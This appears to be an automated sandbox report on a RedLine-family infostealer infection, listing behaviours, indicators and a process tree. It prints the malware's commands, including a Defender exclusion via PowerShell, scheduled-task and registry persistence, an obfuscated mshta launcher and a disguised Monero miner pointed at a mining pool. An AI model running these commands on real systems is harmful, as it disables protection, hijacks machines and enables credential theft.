redline | 5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

System Information Discovery

Processes:

2734919.scr

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2734919.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2734919.scr

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Mon20d3b8b752.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Mon20d3b8b752.exe

Loads dropped DLL 6 IoCs

Processes:

setup_install.exesetup.tmp

pid	Process
908	setup_install.exe
908	setup_install.exe
908	setup_install.exe
908	setup_install.exe
908	setup_install.exe
4544	setup.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral8/files/0x000500000001ab9b-299.dat	themida
behavioral8/files/0x000500000001ab9b-313.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3433187.scr

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	3433187.scr

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

2734919.scr

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2734919.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
40	ipinfo.io
186	ipinfo.io
187	ipinfo.io
323	ipinfo.io
377	api.db-ip.com
378	api.db-ip.com
21	ip-api.com
39	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

2734919.scr

pid	Process
1244	2734919.scr

Suspicious use of SetThreadContext 2 IoCs

Processes:

Mon209c830507d573.exeMon20927aab1e5.exe

description	pid	Process	procid_target
PID 2696 set thread context of 1372	2696	Mon209c830507d573.exe	105
PID 1460 set thread context of 1232	1460	Mon20927aab1e5.exe	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4792	1728	WerFault.exe	98
4772	1728	WerFault.exe	98
5056	1728	WerFault.exe	98
5992	1728	WerFault.exe	98
3540	4692	WerFault.exe	195
1160	1728	WerFault.exe	98
6456	1728	WerFault.exe	98
6904	1728	WerFault.exe	98
6800	5172	WerFault.exe	160
8180	2304	WerFault.exe	117

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

7857317.scr

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7857317.scr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7857317.scr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7857317.scr

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
1644	schtasks.exe
7708	schtasks.exe
6284	schtasks.exe
6288	schtasks.exe
6368	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
5568	timeout.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
3952	taskkill.exe
6408	taskkill.exe
9176	taskkill.exe
2284	taskkill.exe
4156	taskkill.exe
6488	taskkill.exe
7736	taskkill.exe
8088	taskkill.exe
1612	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe7857317.scrMon20d3b8b752.exe

pid	Process
1348	powershell.exe
1820	7857317.scr
1820	7857317.scr
1348	powershell.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe
2044	Mon20d3b8b752.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

7857317.scr

pid	Process
1820	7857317.scr

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

Mon209b3da1556b9a317.exeMon206d48916f93c5.exepowershell.exeDownFlSetup110.exe7524390.scr4.exetaskkill.exe

description	pid	Process
Token: SeDebugPrivilege	748	Mon209b3da1556b9a317.exe
Token: SeDebugPrivilege	1444	Mon206d48916f93c5.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	2956	DownFlSetup110.exe
Token: SeDebugPrivilege	1720	7524390.scr
Token: SeDebugPrivilege	4144	4.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeShutdownPrivilege	1584
Token: SeCreatePagefilePrivilege	1584
Token: SeShutdownPrivilege	1584
Token: SeCreatePagefilePrivilege	1584

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 3332 wrote to memory of 944	3332	setup_x86_x64_install.exe	75
PID 3332 wrote to memory of 944	3332	setup_x86_x64_install.exe	75
PID 3332 wrote to memory of 944	3332	setup_x86_x64_install.exe	75
PID 944 wrote to memory of 908	944	setup_installer.exe	76
PID 944 wrote to memory of 908	944	setup_installer.exe	76
PID 944 wrote to memory of 908	944	setup_installer.exe	76
PID 908 wrote to memory of 1412	908	setup_install.exe	79
PID 908 wrote to memory of 1412	908	setup_install.exe	79
PID 908 wrote to memory of 1412	908	setup_install.exe	79
PID 908 wrote to memory of 400	908	setup_install.exe	80
PID 908 wrote to memory of 400	908	setup_install.exe	80
PID 908 wrote to memory of 400	908	setup_install.exe	80
PID 908 wrote to memory of 2496	908	setup_install.exe	81
PID 908 wrote to memory of 2496	908	setup_install.exe	81
PID 908 wrote to memory of 2496	908	setup_install.exe	81
PID 908 wrote to memory of 296	908	setup_install.exe	82
PID 908 wrote to memory of 296	908	setup_install.exe	82
PID 908 wrote to memory of 296	908	setup_install.exe	82
PID 908 wrote to memory of 668	908	setup_install.exe	83
PID 908 wrote to memory of 668	908	setup_install.exe	83
PID 908 wrote to memory of 668	908	setup_install.exe	83
PID 908 wrote to memory of 1256	908	setup_install.exe	89
PID 908 wrote to memory of 1256	908	setup_install.exe	89
PID 908 wrote to memory of 1256	908	setup_install.exe	89
PID 908 wrote to memory of 3176	908	setup_install.exe	84
PID 908 wrote to memory of 3176	908	setup_install.exe	84
PID 908 wrote to memory of 3176	908	setup_install.exe	84
PID 908 wrote to memory of 408	908	setup_install.exe	85
PID 908 wrote to memory of 408	908	setup_install.exe	85
PID 908 wrote to memory of 408	908	setup_install.exe	85
PID 908 wrote to memory of 896	908	setup_install.exe	86
PID 908 wrote to memory of 896	908	setup_install.exe	86
PID 908 wrote to memory of 896	908	setup_install.exe	86
PID 908 wrote to memory of 3680	908	setup_install.exe	88
PID 908 wrote to memory of 3680	908	setup_install.exe	88
PID 908 wrote to memory of 3680	908	setup_install.exe	88
PID 908 wrote to memory of 2304	908	setup_install.exe	117
PID 908 wrote to memory of 2304	908	setup_install.exe	117
PID 908 wrote to memory of 2304	908	setup_install.exe	117
PID 908 wrote to memory of 4032	908	setup_install.exe	90
PID 908 wrote to memory of 4032	908	setup_install.exe	90
PID 908 wrote to memory of 4032	908	setup_install.exe	90
PID 1412 wrote to memory of 1348	1412	cmd.exe	102
PID 1412 wrote to memory of 1348	1412	cmd.exe	102
PID 1412 wrote to memory of 1348	1412	cmd.exe	102
PID 668 wrote to memory of 1820	668	cmd.exe	91
PID 668 wrote to memory of 1820	668	cmd.exe	91
PID 668 wrote to memory of 1820	668	cmd.exe	91
PID 400 wrote to memory of 1428	400	cmd.exe	101
PID 400 wrote to memory of 1428	400	cmd.exe	101
PID 400 wrote to memory of 1428	400	cmd.exe	101
PID 2496 wrote to memory of 1728	2496	cmd.exe	98
PID 2496 wrote to memory of 1728	2496	cmd.exe	98
PID 2496 wrote to memory of 1728	2496	cmd.exe	98
PID 296 wrote to memory of 1460	296	cmd.exe	100
PID 296 wrote to memory of 1460	296	cmd.exe	100
PID 296 wrote to memory of 1460	296	cmd.exe	100
PID 3176 wrote to memory of 1444	3176	cmd.exe	99
PID 3176 wrote to memory of 1444	3176	cmd.exe	99
PID 1256 wrote to memory of 1748	1256	cmd.exe	92
PID 1256 wrote to memory of 1748	1256	cmd.exe	92
PID 1256 wrote to memory of 1748	1256	cmd.exe	92
PID 3680 wrote to memory of 2044	3680	cmd.exe	93
PID 3680 wrote to memory of 2044	3680	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3332
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0B368385\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:400
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20762bc3f6.exe
        
        Mon20762bc3f6.exe
        5⤵
        Executes dropped EXE
        
        PID:1428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2496
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon206b909958ed4.exe
        
        Mon206b909958ed4.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 660
        6⤵
        Program crash
        
        PID:4792
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 676
        6⤵
        Program crash
        
        PID:4772
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 716
        6⤵
        Program crash
        
        PID:5056
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 812
        6⤵
        Program crash
        
        PID:5992
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 892
        6⤵
        Program crash
        
        PID:1160
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 992
        6⤵
        Program crash
        
        PID:6456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1104
        6⤵
        Program crash
        
        PID:6904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:296
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exe
        
        Mon20927aab1e5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1460
      - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exe
        6⤵
        Executes dropped EXE
        
        PID:1232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:668
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon204014f13870f5e.exe
        
        Mon204014f13870f5e.exe
        5⤵
        Executes dropped EXE
        
        PID:1820
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3176
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon206d48916f93c5.exe
        
        Mon206d48916f93c5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
      - C:\Users\Admin\AppData\Roaming\7524390.scr
        
        "C:\Users\Admin\AppData\Roaming\7524390.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1720
      - C:\Users\Admin\AppData\Roaming\2734919.scr
        
        "C:\Users\Admin\AppData\Roaming\2734919.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1244
      - C:\Users\Admin\AppData\Roaming\3433187.scr
        
        "C:\Users\Admin\AppData\Roaming\3433187.scr" /S
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3404
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:4808
      - C:\Users\Admin\AppData\Roaming\6695922.scr
        
        "C:\Users\Admin\AppData\Roaming\6695922.scr" /S
        6⤵
        
        PID:4180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
      4⤵
      PID:408
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exe
        
        Mon209c830507d573.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2696
      - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exe
        6⤵
        Executes dropped EXE
        
        PID:1372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
      4⤵
      PID:896
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon2083f8d8970a0b2d.exe
        
        Mon2083f8d8970a0b2d.exe
        5⤵
        Executes dropped EXE
        
        PID:3012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
      4⤵
      PID:2304
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209b3da1556b9a317.exe
        
        Mon209b3da1556b9a317.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
        
        C:\Users\Admin\AppData\Roaming\5003617.scr
        
        "C:\Users\Admin\AppData\Roaming\5003617.scr" /S
        8⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Roaming\6513516.scr
        
        "C:\Users\Admin\AppData\Roaming\6513516.scr" /S
        8⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\4918364.scr
        
        "C:\Users\Admin\AppData\Roaming\4918364.scr" /S
        8⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Users\Admin\AppData\Roaming\8130588.scr
        
        "C:\Users\Admin\AppData\Roaming\8130588.scr" /S
        8⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Roaming\8305735.scr
        
        "C:\Users\Admin\AppData\Roaming\8305735.scr" /S
        8⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
        7⤵
        Executes dropped EXE
        
        PID:2304
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 1552
        8⤵
        Program crash
        
        PID:8180
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\is-BVHHK.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BVHHK.tmp\setup.tmp" /SL5="$10256,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        9⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\is-VATMS.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VATMS.tmp\setup.tmp" /SL5="$20278,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        10⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\is-QHVDS.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QHVDS.tmp\postback.exe" ss1
        11⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
        9⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
        10⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
        11⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
        10⤵
        Creates scheduled task(s)
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:4464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5672
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:6284
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:3224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Executes dropped EXE
        
        PID:1108
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7708
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:6368
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3680
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20d3b8b752.exe
        
        Mon20d3b8b752.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:2044
      - C:\Users\Admin\Pictures\Adobe Films\ExezmJRs5i4eLQ_kNlOz6m_K.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ExezmJRs5i4eLQ_kNlOz6m_K.exe"
        6⤵
        Executes dropped EXE
        
        PID:4168
      - C:\Users\Admin\Pictures\Adobe Films\YfHTL6z9hTuMndrxBlWJmFSK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\YfHTL6z9hTuMndrxBlWJmFSK.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6368
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1644
        
        C:\Users\Admin\Documents\iMIz3FM4Wg9xe8MR0Cm2T6PY.exe
        
        "C:\Users\Admin\Documents\iMIz3FM4Wg9xe8MR0Cm2T6PY.exe"
        7⤵
        
        PID:6016
        
        C:\Users\Admin\Pictures\Adobe Films\jxnyFXPBA5i31RRKjrtUJQ7l.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\jxnyFXPBA5i31RRKjrtUJQ7l.exe"
        8⤵
        
        PID:8024
        
        C:\Users\Admin\Pictures\Adobe Films\1bjVbQkTDA2P9G1rbFG2BTth.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1bjVbQkTDA2P9G1rbFG2BTth.exe"
        8⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        Executes dropped EXE
        
        PID:4464
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3952
        
        C:\Users\Admin\Pictures\Adobe Films\_HZoBt9Rgu82A_sp6QoHTOKb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\_HZoBt9Rgu82A_sp6QoHTOKb.exe"
        8⤵
        
        PID:4300
        
        C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe" /mixtwo
        8⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "bLkKqlqqu00BdH3H5EQPEIdz.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe" & exit
        9⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "bLkKqlqqu00BdH3H5EQPEIdz.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:6408
        
        C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"
        8⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"" ..\BEDAQQT.ExE&&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0, tRue ) )
        9⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\cmd.exe
        
